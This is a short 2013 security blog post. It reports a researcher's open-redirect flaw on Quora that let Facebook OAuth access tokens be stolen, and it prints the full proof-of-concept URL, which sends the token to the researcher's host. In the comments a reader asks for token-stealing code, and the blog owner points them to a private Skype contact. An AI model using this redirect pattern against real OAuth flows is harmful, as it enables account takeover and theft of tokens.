Home > Information Security > Hack Facebook accounts via Quora

Hack Facebook accounts via Quora

image-quora_app

Indian Security researcher Prakhar Prasad has found a way to hack the facebook accounts by exploiting an open redirection flaw in Quora – one of the famous Question&Answer website.

Quora allows users to be signed up through facebook account.  While signing up for the quora, researcher noticed quora.com was permitted to receive access token from facebook oAuth.

Prasad has managed to steal the access token from the quora website by exploiting an open-redirect security flaw in the quora.com

POC provided by the researcher:
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token

“Facebook OAuth authorization URL requests token permission from the user, but as user will have Quora App installed, it will redirect to value specified in next parameter of OAuth authorization URL with a valid access_token” researcher said in his blog.

In this case , the next parameter’s value is “https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora”.  So the request will redirect user to the above URL with access token which further redirects to the prasad’s page(exploiting open-redirect flaw).  The page created by prasad successfully captures the access token and direct users to the facebook.com

Unwitting users who follow the POC link soon find themself victim to the facebook account hack.

Complete technical details can be found in his personal blog.

You can also check out the video demo here:

Advertisements
  1. 21/07/2013 at 5:06 am

    Hmm is anyone else experiencing problems with the pictures on this blog
    loading? I’m trying to figure out if its a problem on my end or if it’s the blog.
    Any feed-back would be greatly appreciated.

  2. Hassan
    21/07/2013 at 5:19 am

    Dear Zakar,

    there is no problem with the pictures on this blog ,please provide me with pictures from your side for more help

    regards,

  3. medo
    25/07/2013 at 2:33 pm

    i wanna the code to get the access token…i make app then what else to do

    • Hassan
      26/07/2013 at 12:09 pm

      dear medo ,if u want to hack a FB account is not the right place to discussing it,add me this is my skype:
      serialb0y

  4. Hassan
    29/07/2013 at 8:35 am

    Note that the bug was fixed.

  1. No trackbacks yet.

Comment is free

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s